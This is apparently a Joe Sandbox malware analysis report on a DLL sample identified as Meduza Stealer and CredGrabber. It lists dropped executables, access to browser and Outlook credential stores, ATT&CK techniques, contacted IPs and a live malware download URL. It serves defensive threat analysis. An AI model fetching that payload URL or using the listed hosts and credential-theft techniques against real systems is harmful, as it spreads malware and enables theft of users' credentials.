Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: t0ppkxxj.rwu.exe PID: 6796, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 26.0.t0ppkxxj.rwu.exe.7ff621810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.5mg21dmq.1jt.exe.7ff786a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.ochicikt.z2z.exe.7ff741a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.inyligbs.qlq.exe.7ff7cee60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.ochicikt.z2z.exe.7ff741a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.inyligbs.qlq.exe.7ff7cee60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.t0ppkxxj.rwu.exe.7ff621810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.5mg21dmq.1jt.exe.7ff786a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.1958069772.000001C3CD9C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919727858.0000023773BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1965863333.000002BDB06EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0ppkxxj.rwu.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ochicikt.z2z.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: inyligbs.qlq.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5mg21dmq.1jt.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\5mg21dmq.1jt.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\inyligbs.qlq.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\ochicikt.z2z.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\t0ppkxxj.rwu.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 DLL Side-Loading	NTDS	35 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Regsvr32	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Rundll32	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iviewers.dll	35%	Virustotal		Browse
iviewers.dll	26%	ReversingLabs	Win32.Infostealer.Tinba

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Temp\ochicikt.z2z.exe	100%	Joe Sandbox ML
C:\Windows\Temp\5mg21dmq.1jt.exe	100%	Joe Sandbox ML
C:\Windows\Temp\t0ppkxxj.rwu.exe	100%	Joe Sandbox ML
C:\Windows\Temp\inyligbs.qlq.exe	100%	Joe Sandbox ML
C:\Windows\Temp\5mg21dmq.1jt.exe	83%	ReversingLabs	Win64.Trojan.MeduzaStealer
C:\Windows\Temp\inyligbs.qlq.exe	83%	ReversingLabs	Win64.Trojan.MeduzaStealer
C:\Windows\Temp\ochicikt.z2z.exe	83%	ReversingLabs	Win64.Trojan.MeduzaStealer
C:\Windows\Temp\t0ppkxxj.rwu.exe	83%	ReversingLabs	Win64.Trojan.MeduzaStealer

Source	Detection	Scanner	Label
https://api.ipify.orgMQ	0%	Avira URL Cloud	safe
http://www.microsoft.9	0%	Avira URL Cloud	safe
https://go.microsoft.coofiles	0%	Avira URL Cloud	safe
https://api.ipify.orgSQ	0%	Avira URL Cloud	safe
http://147.45.47.15/duschno.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://147.45.47.15/duschno.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.1787640504.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1795909432.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.microsoft.co	t0ppkxxj.rwu.exe, 0000001A.00000003.1956584573.00000220D6B83000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1768364357.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.0000000004957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.00000000045D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000006.00000002.1829359376.0000000007EB5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9738000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.orgMQ	t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9738000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.9	powershell.exe, 00000008.00000002.1839889651.000000000813B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.orgSQ	t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.microsoft.coofiles	t0ppkxxj.rwu.exe, 0000001A.00000003.1956584573.00000220D6B83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	t0ppkxxj.rwu.exe, 0000001A.00000003.1937880674.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D968B000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96A7000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9696000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96C0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9713000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBfq	powershell.exe, 00000006.00000002.1768364357.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.000000000480E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1768364357.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.0000000004957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.00000000045D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1787640504.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1795909432.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97AE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1948618129.00000220D9A2F000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1942801541.00000220D89B8000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1946687678.00000220D89B0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D96AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	t0ppkxxj.rwu.exe, 0000001A.00000003.1937880674.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D968B000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96A7000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9696000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96C0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9713000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.microsoft.t/Regi	t0ppkxxj.rwu.exe, 0000001A.00000003.2156268378.00000220D9364000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1934681447.00000220D9351000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.2156186780.00000220D9360000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.2156155745.00000220D9360000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.1768364357.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.000000000480E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
147.45.47.15	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
193.3.19.151	unknown	Denmark	2107	ARNES-NETAcademicandResearchNetworkofSloveniaSI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578089
Start date and time:	2024-12-19 08:51:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iviewers.dll
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winDLL@43/32@1/3
EGA Information:	Successful, ratio: 44.4%
HCA Information:	Successful, ratio: 87% Number of executed functions: 189 Number of non-executed functions: 142
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target loaddll32.exe, PID 4208 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5052 because it is empty
Execution Graph export aborted for target regsvr32.exe, PID 6988 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 1740 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 6036 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:52:20	API Interceptor	267x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
147.45.47.15	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15/duschno.exe
147.45.47.15	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15/duschno.exe
193.3.19.151	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	duschno.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	1Sj5F6P4nv.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	5LEXIucyEP.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	44qLDKzsfO.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	urkOkB0BdX.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	8F0oMWUhg7.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	WdlA0C4PkO.exe	Get hash	malicious	Go Stealer, Skuld Stealer	Browse	104.26.12.205
	cali.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	winws1.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ARNES-NETAcademicandResearchNetworkofSloveniaSI	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	193.3.19.151
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	193.3.19.151
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	193.3.184.24
	bot.sh4.elf	Get hash	malicious	Mirai	Browse	95.87.151.57
	duschno.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	193.3.19.151
	jade.arm.elf	Get hash	malicious	Mirai	Browse	95.87.151.72
	https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3D	Get hash	malicious	Phisher	Browse	193.3.19.55
	https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==	Get hash	malicious	Unknown	Browse	193.3.184.46
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	95.87.175.59
	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	193.3.168.50
CLOUDFLARENETUS	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	MFQbv2Yuzv.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	104.21.86.111
	Y41xQGmT37.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
	O3u9C8cpzl.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
	niwvNnBk2p.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
	661fW9gxDp.exe	Get hash	malicious	LummaC	Browse	104.21.64.80
	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	S6oj0LoSiL.exe	Get hash	malicious	LummaC	Browse	104.21.64.80
FREE-NET-ASFREEnetEU	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	147.45.124.54
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	147.45.124.54
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	147.45.124.54
